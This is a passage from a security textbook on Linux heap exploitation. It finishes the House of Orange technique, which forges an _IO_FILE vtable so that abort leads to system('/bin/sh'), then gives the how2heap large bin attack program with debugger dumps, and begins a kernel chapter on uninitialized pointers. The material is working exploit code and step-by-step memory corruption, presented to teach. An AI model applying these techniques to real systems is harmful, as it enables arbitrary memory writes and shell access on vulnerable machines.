[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602400, bk=0x602400
 →   Chunk(addr=0x602410, size=0xbe0, flags=PREV_INUSE)

This leaks a libc address. We can also see that the old top chunk was shrunk by 0x20; the reclaimed space holds the fencepost chunks. The heap now looks like this:

+---------------+
|       p1      |
+---------------+
|  old top-0x20 |
+---------------+
|  fencepost 1  |
+---------------+
|  fencepost 2  |
+---------------+
|      ...      |
+---------------+
|       p2      |
+---------------+
|    new top    |
+---------------+

The details are as follows:

                  if (old_size != 0)
                    {
                      /*
                         Shrink old_top to insert fenceposts, keeping size a
                         multiple of MALLOC_ALIGNMENT. We know there is at least
                         enough space in old_top to do this.
                       */
                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
                      set_head (old_top, old_size | PREV_INUSE);

                      /*
                         Note that the following assignments completely overwrite
                         old_top when old_size was previously MINSIZE.  This is
                         intentional. We need the fencepost, even if old_top otherwise gets
                         lost.
                       */
                      chunk_at_offset (old_top, old_size)->size =
                        (2 * SIZE_SZ) | PREV_INUSE;

                      chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
                        (2 * SIZE_SZ) | PREV_INUSE;

                      /* If possible, release the rest. */
                      if (old_size >= MINSIZE)
                        {
                          _int_free (av, old_top, 1);
                        }
                    }
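The shrink step is easy to verify numerically. The sketch below assumes x86-64 values (SIZE_SZ = 8, MALLOC_ALIGN_MASK = 0xf); the helper names are hypothetical and simply restate the expressions from the excerpt.

```c
#include <stdint.h>

/* Assumed x86-64 values. */
#define SIZE_SZ            UINT64_C(8)
#define MALLOC_ALIGN_MASK  UINT64_C(0xf)

/* Size of old_top after room for the two fenceposts is taken away. */
uint64_t shrink_for_fenceposts(uint64_t old_size)
{
    return (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
}

/* Address of the first fencepost chunk; the second follows 2*SIZE_SZ later. */
uint64_t fencepost_addr(uint64_t old_top, uint64_t old_size)
{
    return old_top + shrink_for_fenceposts(old_size);
}
```

For the forged size 0xc00 this gives 0xbe0, and with old_top at 0x602400 the fenceposts land at 0x602fe0 and 0x602ff0, matching the gdb output shown earlier.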

From the fd/bk pointers of the old top chunk in the unsorted bin we can derive the address of _IO_list_all. The overflow is then used to overwrite the bk of old top with _IO_list_all-0x10, so that the unsorted bin attack sets _IO_list_all to &unsorted_bin-0x10:

          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);
gef➤  x/4gx p1-0x10+0x400
0x602400:    0x0000000000000000    0x0000000000000be1
0x602410:    0x00007ffff7dd1b78    0x00007ffff7dd2510
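The new bk value follows from the leaked pointer by adding a fixed offset. In the sketch below, 0x9a8 is the constant used by the demo program for its particular libc-2.23 build; it is an assumption that does not carry over to other builds, and the helper names are hypothetical.

```c
#include <stdint.h>

/*
 * Distance from the leaked unsorted bin pointer to _IO_list_all.
 * Taken from the demo program (top[2] + 0x9a8); build-specific.
 */
#define IO_LIST_ALL_OFFSET UINT64_C(0x9a8)

/* Address of _IO_list_all derived from the fd/bk leak. */
uint64_t io_list_all_addr(uint64_t leaked_fd)
{
    return leaked_fd + IO_LIST_ALL_OFFSET;
}

/* Value to write into old top's bk so that bck->fd hits _IO_list_all. */
uint64_t bk_for_attack(uint64_t leaked_fd)
{
    return io_list_all_addr(leaked_fd) - 0x10;
}
```

With the leaked value 0x7ffff7dd1b78 this gives _IO_list_all at 0x7ffff7dd2520 and a bk of 0x7ffff7dd2510, which is the value visible in the dump above.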

A word on error handling in glibc. When a memory error is detected, malloc_printerr() is normally called to print an error message. Let's follow the code from there:

static void
malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
{
  [...]
  if ((action & 5) == 5)
    __libc_message (action & 2, "%s\n", str);
  else if (action & 1)
    {
      char buf[2 * sizeof (uintptr_t) + 1];

      buf[sizeof (buf) - 1] = '\0';
      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
      while (cp > buf)
        *--cp = '0';

      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
                      __libc_argv[0] ? : "<unknown>", str, cp);
    }
  else if (action & 2)
    abort ();
}

It calls __libc_message:

// sysdeps/posix/libc_fatal.c
/* Abort with an error message.  */
void
__libc_message (int do_abort, const char *fmt, ...)
{
  [...]
  if (do_abort)
    {
      BEFORE_ABORT (do_abort, written, fd);

      /* Kill the application.  */
      abort ();
    }
}

When do_abort is set, abort() is called, which in turn calls fflush, that is, _IO_flush_all_lockp:

// stdlib/abort.c
#define fflush(s) _IO_flush_all_lockp (0)

  if (stage == 1)
    {
      ++stage;
      fflush (NULL);
    }
// libio/genops.c
int
_IO_flush_all_lockp (int do_lock)
{
  int result = 0;
  struct _IO_FILE *fp;
  int last_stamp;

#ifdef _IO_MTSAFE_IO
  __libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
  if (do_lock)
    _IO_lock_lock (list_all_lock);
#endif

  last_stamp = _IO_list_all_stamp;
  fp = (_IO_FILE *) _IO_list_all;   // overwritten by the attack
  while (fp != NULL)
    {
      run_fp = fp;
      if (do_lock)
    _IO_flockfile (fp);

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
       || (_IO_vtable_offset (fp) == 0
           && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                    > fp->_wide_data->_IO_write_base))
#endif
       )
      && _IO_OVERFLOW (fp, EOF) == EOF)     // redirected to system
    result = EOF;

      if (do_lock)
    _IO_funlockfile (fp);
      run_fp = NULL;

      if (last_stamp != _IO_list_all_stamp)
    {
      /* Something was added to the list.  Start all over again.  */
      fp = (_IO_FILE *) _IO_list_all;
      last_stamp = _IO_list_all_stamp;
    }
      else
    fp = fp->_chain;    // moves fp to the region we choose
    }

#ifdef _IO_MTSAFE_IO
  if (do_lock)
    _IO_lock_unlock (list_all_lock);
  __libc_cleanup_region_end (0);
#endif

  return result;
}

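_IO_list_all is a pointer to an _IO_FILE_plus object. Our goal is to overwrite the _IO_list_all pointer so that it points to a forged structure whose _IO_OVERFLOW entry is system and whose first 8 bytes are set to '/bin/sh'. The call to _IO_OVERFLOW(fp, EOF) then ends up as a call to system('/bin/sh').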

// libio/libioP.h
/* We always allocate an extra word following an _IO_FILE.
   This contains a pointer to the function jump table used.
   This is for compatibility with C++ streambuf; the word can
   be used to smash to a pointer to a virtual function table. */

struct _IO_FILE_plus
{
  _IO_FILE file;
  const struct _IO_jump_t *vtable;
};

// libio/libio.h
struct _IO_FILE {
  int _flags;        /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

  /* The following pointers correspond to the C++ streambuf protocol. */
  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
  char* _IO_read_ptr;    /* Current read pointer */
  char* _IO_read_end;    /* End of get area. */
  char* _IO_read_base;    /* Start of putback+get area. */
  char* _IO_write_base;    /* Start of put area. */
  char* _IO_write_ptr;    /* Current put pointer. */
  char* _IO_write_end;    /* End of put area. */
  char* _IO_buf_base;    /* Start of reserve area. */
  char* _IO_buf_end;    /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
#if 0
  int _blksize;
#else
  int _flags2;
#endif
  _IO_off_t _old_offset; /* This used to be _offset but it's too small.  */

#define __HAVE_COLUMN /* temporary */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  /*  char* _save_gptr;  char* _save_egptr; */

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

It contains a pointer to a function jump table. The structure of _IO_jump_t is as follows:

// libio/libioP.h
struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
    get_column;
    set_column;
#endif
};

By forging the __overflow entry of _IO_jump_t so that it holds the address of system, we get a shell.

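When the memory error leads into _IO_flush_all_lockp, _IO_list_all still points at the unsorted bin, which is not an address we control. We therefore need fp->_chain to move fp to memory that we do control. This is why the size field is set to 0x61: at this point _IO_list_all holds &unsorted_bin-0x10, and offset 0x60 from there lands on smallbins[5]. If we now trigger a small allocation that the chunk cannot satisfy, malloc moves old top out of the unsorted bin and into smallbins[5]. In the _IO_FILE structure, offset 0x60 is struct _IO_marker *_markers and offset 0x68 is struct _IO_FILE *_chain, and both slots now hold the start address of old top. fp thus ends up pointing at old top, an address we control.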
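The offset arithmetic in this step can be checked with a few lines of Python. This is only a sketch under stated assumptions: the offsets are those of struct malloc_state and struct _IO_FILE in 64-bit glibc 2.23 (bins[] at arena offset 0x68, _chain at FILE offset 0x68), and the helper names mirror glibc macros but are otherwise illustrative.

```python
# Assumed layout: 64-bit glibc 2.23. Other versions may differ.
SIZE_SZ = 8
BINS_OFFSET = 0x68   # assumed offset of bins[] inside struct malloc_state
CHUNK_BK = 0x18      # offset of bk inside a chunk header
FILE_CHAIN = 0x68    # offset of _chain inside struct _IO_FILE


def bin_at(index):
    """Arena-relative address of the pseudo chunk header for bin `index`."""
    return BINS_OFFSET + (index - 1) * 2 * SIZE_SZ - 2 * SIZE_SZ


def smallbin_index(size):
    """Small bin index for a chunk size on 64-bit (size >> 4)."""
    return size >> 4


# After the unsorted bin attack, _IO_list_all holds bin_at(1), i.e. main_arena+88.
fp = bin_at(1)
chain_slot = fp + FILE_CHAIN          # where fp->_chain is read from

# A size field of 0x61 means a chunk size of 0x60 (low bits are flags).
index = smallbin_index(0x61 & ~0x7)
bk_slot = bin_at(index) + CHUNK_BK    # bk pointer of that small bin

print(hex(fp), hex(chain_slot), index, hex(bk_slot))
```

Under these assumptions chain_slot and bk_slot coincide, which is why a size of 0x61 makes fp->_chain read the old top address. glibc's bin index 6 is the fifth small bin, because index 1 is the unsorted bin.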

Before the redirected _IO_OVERFLOW is reached, a few conditions are checked:

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
       || (_IO_vtable_offset (fp) == 0
           && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                    > fp->_wide_data->_IO_write_base))
#endif
       )
      && _IO_OVERFLOW (fp, EOF) == EOF)     // must be redirected to system
// libio/libio.h

  struct _IO_wide_data *_wide_data;

/* Extra data for wide character streams.  */
struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;    /* Current read pointer */
  wchar_t *_IO_read_end;    /* End of get area. */
  wchar_t *_IO_read_base;    /* Start of putback+get area. */
  wchar_t *_IO_write_base;    /* Start of put area. */
  wchar_t *_IO_write_ptr;    /* Current put pointer. */
  wchar_t *_IO_write_end;    /* End of put area. */
  wchar_t *_IO_buf_base;    /* Start of reserve area. */
  wchar_t *_IO_buf_end;        /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;    /* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;    /* Pointer to first valid character of
                   backup area */
  wchar_t *_IO_save_end;    /* Pointer to end of non-current get area. */

  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;

  wchar_t _shortbuf[1];

  const struct _IO_jump_t *_wide_vtable;
};

So here we set fp->_mode = 0, fp->_IO_write_base = (char *) 2 and fp->_IO_write_ptr = (char *) 3 to pass the check.

Next, we forge the _IO_jump_t so that its __overflow entry points to winner:

gef➤  x/30gx p1-0x10+0x400
0x602400:    0x0068732f6e69622f    0x0000000000000061  <-- old top
0x602410:    0x00007ffff7dd1b78    0x00007ffff7dd2510      <-- bk points to io_list_all-0x10
0x602420:    0x0000000000000002    0x0000000000000003      <-- _IO_write_base, _IO_write_ptr
0x602430:    0x0000000000000000    0x0000000000000000
0x602440:    0x0000000000000000    0x0000000000000000
0x602450:    0x0000000000000000    0x0000000000000000
0x602460:    0x0000000000000000    0x0000000000000000
0x602470:    0x0000000000000000    0x00000000004006d3      <-- winner
0x602480:    0x0000000000000000    0x0000000000000000
0x602490:    0x0000000000000000    0x0000000000000000
0x6024a0:    0x0000000000000000    0x0000000000000000
0x6024b0:    0x0000000000000000    0x0000000000000000
0x6024c0:    0x0000000000000000    0x0000000000000000
0x6024d0:    0x0000000000000000    0x0000000000602460      <-- vtable
0x6024e0:    0x0000000000000000    0x0000000000000000
gef➤  p *((struct _IO_FILE_plus *) 0x602400)
$1 = {
  file = {
    _flags = 0x6e69622f,
    _IO_read_ptr = 0x61 <error: Cannot access memory at address 0x61>,
    _IO_read_end = 0x7ffff7dd1b78 <main_arena+88> "\020@b",
    _IO_read_base = 0x7ffff7dd2510 "",
    _IO_write_base = 0x2 <error: Cannot access memory at address 0x2>,
    _IO_write_ptr = 0x3 <error: Cannot access memory at address 0x3>,
    _IO_write_end = 0x0,
    _IO_buf_base = 0x0,
    _IO_buf_end = 0x0,
    _IO_save_base = 0x0,
    _IO_backup_base = 0x0,
    _IO_save_end = 0x0,
    _markers = 0x0,
    _chain = 0x0,
    _fileno = 0x0,
    _flags2 = 0x0,
    _old_offset = 0x4006d3,
    _cur_column = 0x0,
    _vtable_offset = 0x0,
    _shortbuf = "",
    _lock = 0x0,
    _offset = 0x0,
    _codecvt = 0x0,
    _wide_data = 0x0,
    _freeres_list = 0x0,
    _freeres_buf = 0x0,
    __pad5 = 0x0,
    _mode = 0x0,
    _unused2 = '\000' <repeats 19 times>
  },
  vtable = 0x602460
}
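The layout in the dump above can be reproduced offline as a byte string. The sketch below is an illustration only: the field offsets (0x20, 0x28, 0xc0, 0xd8, and __overflow at vtable offset 0x18) are read off the dump and assume 64-bit glibc 2.23, and build_fake_file is a hypothetical helper name, not part of how2heap.

```python
import struct


def build_fake_file(base, fd, bk, overflow_target):
    """Build 0xe0 bytes that double as the old top chunk and a fake _IO_FILE_plus."""
    buf = bytearray(0xe0)
    buf[0x00:0x08] = b"/bin/sh\x00"               # _flags area, also system()'s argument
    struct.pack_into("<Q", buf, 0x08, 0x61)       # chunk size field
    struct.pack_into("<Q", buf, 0x10, fd)         # chunk fd
    struct.pack_into("<Q", buf, 0x18, bk)         # chunk bk = _IO_list_all - 0x10
    struct.pack_into("<Q", buf, 0x20, 2)          # _IO_write_base
    struct.pack_into("<Q", buf, 0x28, 3)          # _IO_write_ptr > _IO_write_base
    vtable = base + 0x60                          # fake jump table inside the chunk
    struct.pack_into("<Q", buf, 0x60 + 0x18, overflow_target)  # __overflow slot
    struct.pack_into("<i", buf, 0xc0, 0)          # _mode = 0
    struct.pack_into("<Q", buf, 0xd8, vtable)     # vtable pointer
    return bytes(buf)


# Values taken from the gef session above.
fake = build_fake_file(
    base=0x602400,
    fd=0x7ffff7dd1b78,
    bk=0x7ffff7dd2510,
    overflow_target=0x4006d3,
)
print(fake[:8], hex(struct.unpack_from("<Q", fake, 0xd8)[0]))
```

Placing the fake jump table inside the same chunk keeps everything within memory the overflow already controls; any other writable, known address would serve equally well.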

Finally, allocate a chunk of any size. Because size <= 2*SIZE_SZ holds, malloc_printerr is called, which reaches _IO_OVERFLOW inside _IO_flush_all_lockp and gives us a shell.

  for (;; )
    {
      int iters = 0;
      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;
          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
              || __builtin_expect (victim->size > av->system_mem, 0))
            malloc_printerr (check_action, "malloc(): memory corruption",
                             chunk2mem (victim), av);
          size = chunksize (victim);

With that, all the heap exploitation techniques in how2heap have been covered.

3.1.9 Linux Heap Exploitation (IV)

Download files

how2heap

large_bin_attack

#include<stdio.h>
#include<stdlib.h>

int main() {
    unsigned long stack_var1 = 0;
    unsigned long stack_var2 = 0;

    fprintf(stderr, "The targets we want to rewrite on stack:\n");
    fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
    fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);

    unsigned long *p1 = malloc(0x100);
    fprintf(stderr, "Now, we allocate the first chunk: %p\n", p1 - 2);
    malloc(0x10);

    unsigned long *p2 = malloc(0x400);
    fprintf(stderr, "Then, we allocate the second chunk(large chunk): %p\n", p2 - 2);
    malloc(0x10);

    unsigned long *p3 = malloc(0x400);
    fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %p\n\n", p3 - 2);
    malloc(0x10);

    // deal with tcache - libc-2.26
    // int *a[10], *b[10], i;
    // for (i = 0; i < 7; i++) {
    //     a[i] = malloc(0x100);
    //     b[i] = malloc(0x400);
    // }
    // for (i = 0; i < 7; i++) {
    //     free(a[i]);
    //     free(b[i]);
    // }

    free(p1);
    free(p2);
    fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted bin\n");

    malloc(0x30);
    fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist\n\n");

    p2[-1] = 0x3f1;
    p2[0] = 0;
    p2[2] = 0;
    p2[1] = (unsigned long)(&stack_var1 - 2);
    p2[3] = (unsigned long)(&stack_var2 - 4);
    fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunk\n\n");

    free(p3);
    malloc(0x30);
    fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:\n");
    fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
    fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
}
$ gcc -g large_bin_attack.c
$ ./a.out 
The targets we want to rewrite on stack:
stack_var1 (0x7fffffffdeb0): 0
stack_var2 (0x7fffffffdeb8): 0

Now, we allocate the first chunk: 0x555555757000
Then, we allocate the second chunk(large chunk): 0x555555757130
Finally, we allocate the third chunk(large chunk): 0x555555757560

Now, We free the first and the second chunks now and they will be inserted in the unsorted bin
Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist

Now we use a vulnerability to overwrite the freed second chunk

Finally, we free the third chunk and malloc again, targets should have already been rewritten:
stack_var1 (0x7fffffffdeb0): 0x555555757560
stack_var2 (0x7fffffffdeb8): 0x555555757560

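This technique can be used to overwrite the value at an arbitrary address, such as the stack variables stack_var1 and stack_var2 (the value written is the address of the chunk being inserted). In practice it is often a prelude to other exploits, for example overwriting the global variable global_max_fast with a very large value in preparation for a fastbin attack.

First we allocate chunks p1, p2 and p3, with other chunks in between so that they are not merged when freed. The memory layout at this point is: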

gef➤  x/2gx &stack_var1 
0x7fffffffde70:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx p1-2
0x555555757000:    0x0000000000000000    0x0000000000000111  <-- p1
0x555555757010:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p2-6
0x555555757110:    0x0000000000000000    0x0000000000000021
0x555555757120:    0x0000000000000000    0x0000000000000000
0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2
0x555555757140:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p3-6
0x555555757540:    0x0000000000000000    0x0000000000000021
0x555555757550:    0x0000000000000000    0x0000000000000000
0x555555757560:    0x0000000000000000    0x0000000000000411  <-- p3
0x555555757570:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p3+(0x410/8)-2
0x555555757970:    0x0000000000000000    0x0000000000000021
0x555555757980:    0x0000000000000000    0x0000000000000000
0x555555757990:    0x0000000000000000    0x0000000000020671  <-- top
0x5555557579a0:    0x0000000000000000    0x0000000000000000

Then free p1 and p2 in turn. Both free chunks are placed in the unsorted bin:

gef➤  x/8gx p1-2
0x555555757000:    0x0000000000000000    0x0000000000000111  <-- p1 [be freed]
0x555555757010:    0x00007ffff7dd3b78    0x0000555555757130
0x555555757020:    0x0000000000000000    0x0000000000000000
0x555555757030:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p2-2
0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2 [be freed]
0x555555757140:    0x0000555555757000    0x00007ffff7dd3b78
0x555555757150:    0x0000000000000000    0x0000000000000000
0x555555757160:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757130, bk=0x555555757000
 →   Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)   →   Chunk(addr=0x555555757010, size=0x110, flags=PREV_INUSE)
[+] Found 2 chunks in unsorted bin.

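Next, malloc an arbitrary chunk. p1 is split in two: one part is returned as the allocated chunk and the remainder stays in the unsorted bin (this is what p1 is for; without it, p2 would be the chunk that gets split). p2, meanwhile, is sorted into its large bin list: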

gef➤  x/14gx p1-2
0x555555757000:    0x0000000000000000    0x0000000000000041  <-- p1-1
0x555555757010:    0x00007ffff7dd3c78    0x00007ffff7dd3c78
0x555555757020:    0x0000000000000000    0x0000000000000000
0x555555757030:    0x0000000000000000    0x0000000000000000
0x555555757040:    0x0000000000000000    0x00000000000000d1  <-- p1-2 [be freed]
0x555555757050:    0x00007ffff7dd3b78    0x00007ffff7dd3b78      <-- fd, bk
0x555555757060:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p2-2
0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2 [be freed]
0x555555757140:    0x00007ffff7dd3f68    0x00007ffff7dd3f68      <-- fd, bk
0x555555757150:    0x0000555555757130    0x0000555555757130      <-- fd_nextsize, bk_nextsize
0x555555757160:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757040, bk=0x555555757040
 →   Chunk(addr=0x555555757050, size=0xd0, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.
gef➤  heap bins large
[ Large Bins for arena 'main_arena' ]
[+] large_bins[63]: fw=0x555555757130, bk=0x555555757130
 →   Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)
[+] Found 1 chunks in 1 large non-empty bins.

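The sorting process is shown below. Note that chunks in a large bin are ordered from largest to smallest along the fd pointers; chunks of the same size are ordered by most recent use: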

          /* place chunk in bin */

          if (in_smallbin_range (size))
            {
                [ ... ]
            }
          else
            {
              victim_index = largebin_index (size);
              bck = bin_at (av, victim_index);
              fwd = bck->fd;

              /* maintain large bins in sorted order */
              if (fwd != bck)
                {
                  /* Or with inuse bit to speed comparisons */
                  size |= PREV_INUSE;
                  /* if smaller than smallest, bypass loop below */
                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
                    {
                        [ ... ]
                    }
                  else
                    {
                      assert ((fwd->size & NON_MAIN_ARENA) == 0);
                      while ((unsigned long) size < fwd->size)
                        {
                            [ ... ]
                        }

                      if ((unsigned long) size == (unsigned long) fwd->size)
                        [ ... ]
                      else
                        {
                          victim->fd_nextsize = fwd;
                          victim->bk_nextsize = fwd->bk_nextsize;
                          fwd->bk_nextsize = victim;
                          victim->bk_nextsize->fd_nextsize = victim;
                        }
                      bck = fwd->bk;
                    }
                }
              else
                [ ... ]
            }

          mark_bin (av, victim_index);
          victim->bk = bck;
          victim->fd = fwd;
          fwd->bk = victim;
          bck->fd = victim;

Suppose we have a vulnerability that lets us modify chunk p2 while it sits in the large bin. Based on the sorting process above, we forge p2 as follows:

gef➤  x/8gx p2-2
0x555555757130:    0x0000000000000000    0x00000000000003f1  <-- fake p2 [be freed]
0x555555757140:    0x0000000000000000    0x00007fffffffde60      <-- bk
0x555555757150:    0x0000000000000000    0x00007fffffffde58      <-- bk_nextsize
0x555555757160:    0x0000000000000000    0x0000000000000000

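Likewise, free p3 so that it enters the unsorted bin, then call malloc so that p3 is sorted into the large bin. During this process the condition (unsigned long) (size) < (unsigned long) (bck->bk->size) is false, so execution takes the else branch, where fwd is the fake p2 and victim is p3. bck is then assigned (&stack_var1 - 2).

While p3 is inserted into the large bin and sorted, our two stack variables are overwritten with victim. The statements responsible are bck->fd = victim; and victim->bk_nextsize->fd_nextsize = victim;.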

gef➤  x/2gx &stack_var1 
0x7fffffffde70:    0x0000555555757560    0x0000555555757560
gef➤  x/8gx p2-2
0x555555757130:    0x0000000000000000    0x00000000000003f1
0x555555757140:    0x0000000000000000    0x0000555555757560
0x555555757150:    0x0000000000000000    0x0000555555757560
0x555555757160:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p3-2
0x555555757560:    0x0000000000000000    0x0000000000000411
0x555555757570:    0x0000555555757130    0x00007fffffffde60
0x555555757580:    0x0000555555757130    0x00007fffffffde58
0x555555757590:    0x0000000000000000    0x0000000000000000
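The two writes can be replayed on a toy memory model to see where they land. This is a simplified sketch, not glibc code: memory is a Python dict keyed by address, the chunk field offsets assume a 64-bit build, and the addresses are the ones from the gef session above.

```python
# Chunk field offsets on 64-bit (assumed).
FD, BK, FD_NEXTSIZE, BK_NEXTSIZE = 0x10, 0x18, 0x20, 0x28


def insert_into_large_bin(mem, victim, fwd):
    """Replay the else-branch statements of the large bin insertion."""
    mem[victim + FD_NEXTSIZE] = fwd
    mem[victim + BK_NEXTSIZE] = mem[fwd + BK_NEXTSIZE]
    mem[fwd + BK_NEXTSIZE] = victim
    mem[mem[victim + BK_NEXTSIZE] + FD_NEXTSIZE] = victim   # write no. 1
    bck = mem[fwd + BK]
    mem[victim + BK] = bck
    mem[victim + FD] = fwd
    mem[fwd + BK] = victim
    mem[bck + FD] = victim                                  # write no. 2


p2 = 0x555555757130          # corrupted chunk already in the large bin (fwd)
p3 = 0x555555757560          # chunk being sorted in (victim)
stack_var1 = 0x7fffffffde70
stack_var2 = 0x7fffffffde78

mem = {
    p2 + BK: stack_var1 - 0x10,           # p2[1] = &stack_var1 - 2
    p2 + BK_NEXTSIZE: stack_var2 - 0x20,  # p2[3] = &stack_var2 - 4
    stack_var1: 0,
    stack_var2: 0,
}

insert_into_large_bin(mem, victim=p3, fwd=p2)
print(hex(mem[stack_var1]), hex(mem[stack_var2]))
```

Both targets end up holding the address of p3, matching the dump: the attacker picks where the write lands, but not the value written.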

On libc-2.26 the situation is the same once tcache is dealt with: before the free calls, fill the tcache bins for both sizes.

3.1.11 Linux Kernel Exploitation

From User Mode to Kernel Mode

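Attempt	User-mode exploitation	Kernel-mode exploitation
Brute-forcing the vulnerability	The application can crash and restart (or be restarted automatically) many times	Leaves the machine in an inconsistent state, usually leading to a panic or reboot
Influencing the target	The attacker has more control over the victim program (especially in local attacks), for example by setting up its execution environment. The victim program is the only consumer of its library subsystems (for example the memory allocator)	The attacker competes with every other application that wants to "influence" the kernel. All applications are consumers of the kernel subsystems
Executing shellcode	The shellcode can make kernel system calls through user-mode gates whose safety and correctness are already guaranteed	The shellcode runs at a higher privilege level and must return to the application correctly without disturbing the system
Bypassing anti-exploitation protections	Requires increasingly complex techniques	Most protections live in the kernel but do not protect the kernel itself. The attacker can even disable most of them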

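Kernel Vulnerability Classes

Uninitialized, Unvalidated, and Corrupted Pointer Dereferences

This class covers every use of a pointer whose contents have been corrupted, were never set properly, or were not validated sufficiently.

A statically declared pointer is initialized to NULL, but in other cases a pointer is uninitialized until it is explicitly assigned, and its value is whatever happens to be in the memory where it is stored. In the example below the pointer lives on the stack, and its contents are the "A" characters left there by a previous function: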

#include <stdio.h>
#include <string.h>

void big_stack_usage() {
    char big[0x100];
    memset(big, 'A', 0x100);
    printf("Big stack: %p ~ %p\n", big, big+0x100);
}

void ptr_un_initialized() {
    char *p;
    printf("Pointer value: %p => %p\n", &p, p);
}

int main() {
    big_stack_usage();
    ptr_un_initialized();
}
$ gcc -fno-stack-protector pointer.c
$ ./a.out
Big stack: 0x7fffd6b0e400 ~ 0x7fffd6b0e500
Pointer value: 0x7fffd6b0e4f8 => 0x4141414141414141

Now a real example, from FreeBSD 8.0:

struct ucred ucred, *ucp;               // [1]
[...]
    refcount_init(&ucred.cr_ref, 1);
    ucred.cr_uid = ip->i_uid;
    ucred.cr_ngroups = 1;
    ucred.cr_groups[0] = dp->i_gid;     // [2]
    ucp = &ucred;

The ucred at [1] is declared on the stack, and at [2] cr_groups[0] is assigned dp->i_gid. Unfortunately, struct ucred is defined like this:

struct ucred {
    u_int   cr_ref;     /* reference count */
[...]
    gid_t   *cr_groups; /* groups */
    int     cr_agroups; /* Available groups */
};

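cr_groups is a pointer, and it is used without ever being initialized. This means the value of dp->i_gid is written to an arbitrary address: whatever happened to be on the stack when ucred was allocated.

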